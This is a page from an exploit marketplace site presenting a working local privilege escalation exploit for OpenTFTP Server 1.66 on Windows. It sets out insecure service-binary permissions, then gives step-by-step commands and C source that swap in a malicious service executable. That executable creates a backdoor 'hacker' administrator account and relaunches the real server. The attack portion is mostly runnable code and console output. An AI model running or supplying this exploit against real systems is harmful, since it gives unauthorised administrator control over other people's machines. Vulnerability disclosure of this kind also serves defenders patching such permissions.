0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
OpenTFTP 1.66 - Local Privilege Escalation Vulnerability
[# Exploit Title: OpenTFTP 1.66 - Local Privilege Escalation
# Exploit Author: boku
# Vendor Homepage: https://sourceforge.net/projects/tftp-server/
# Software Link: https://sourceforge.net/projects/tftp-server/files/tftp%20server%20single%20port/OpenTFTPServerSPInstallerV1.66.exe/download
# Version: 1.66
# Tested On: Windows 10 (32-bit)
# About:
# "MultiThreaded TFTP Server Open Source Freeware Windows/Unix for PXEBOOT, firmware load, support tsize, blksize, timeout Server Port Ranges,
# Block Number Rollover for Large Files. Runs as Service/daemon. Single Port version also available."
# Downloads: 43,284 This Week - https://sourceforge.net/projects/tftp-server/
# Vulnerability Details:
# On Windows, Open TFTP Server v1.66, suffers from insecure file & folder permissions.
# This allows a low-privilge, local attacker to escalate their permissions to Administrator;
# by replacing the 'TFTPServer' service binary with a maliciously-crafted, binary executable.
# The TFTP Server runs as an 'Auto_Start' Service, with 'LocalSystem' priviledges, after the
# default installation. After the attacker has planted the malicious binary, the code will
# be executed with System priviledges on the next boot of the windows device. See PoC below for details.
## Service Information (there is also an Unquoted Service Path)
C:\>sc qc TFTPServer
SERVICE_NAME: TFTPServer
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\OpenTFTPServer\OpenTFTPServerSP.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Open TFTP Single Port Server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
## Insecure Folder Permission
C:\OpenTFTPServer BUILTIN\Administrators:(OI)(CI)(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
## Insecure File/Service Permission
C:\OpenTFTPServer\OpenTFTPServerSP.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
## Local Privilege Escalation Proof of Concept
#0. Download & install Open TFTP Server v1.66
#1. Create low privileged user & change to the user
C:\Users\lowPrivUser>net user lowprivuser | findstr /i "Membership Name" | findstr /v "Full"
User name lowPrivUser
Local Group Memberships *Users
Global Group memberships *None
C:\>whoami
mycomputer\lowprivuser
#2. Move the Service EXE to a new name
C:\OpenTFTPServer>move OpenTFTPServerSP.exe ~OpenTFTPServerSP.exe
1 file(s) moved.
#3. Create malicious binary on kali linux
1) Download dependencies
root@kali# apt install gcc-mingw-w64-i686 wine64 -y
2) Add Admin User C Code
root@kali# cat addAdmin.c
#include<windows.h>
int main(void){
system("net user hacker mypassword /add");
system("net localgroup Administrators hacker /add");
WinExec("C:\\OpenTFTPServer\\~OpenTFTPServerSP.exe",0);
return 0;
}
3) Compile Code
root@kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o OpenTFTPServerSP.exe
#4. Transfer created 'OpenTFTPServerSP.exe' to the Windows Host
#5. Move the created 'OpenTFTPServerSP.exe' binary to the 'C:\OpenTFTPServer\' Folder
C:\>move C:\Users\lowPrivUser\Desktop\OpenTFTPServerSP.exe C:\OpenTFTPServer\
1 file(s) moved.
C:\>dir C:\OpenTFTPServer | findstr "OpenTFTPServerSP.exe"
02/12/2020 05:59 PM 288,659 OpenTFTPServerSP.exe
02/12/2020 06:38 PM 221,560 ~OpenTFTPServerSP.exe
#6. Reboot the Computer
#7. Look at that new Admin
C:\Users\lowPrivUser>net users hacker | findstr "Local name active"
User name hacker
Account active Yes
Local Group Memberships *Administrators *Users
C:\Users\lowPrivUser>net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
boku
hacker
# 0day.today [2024-11-15] #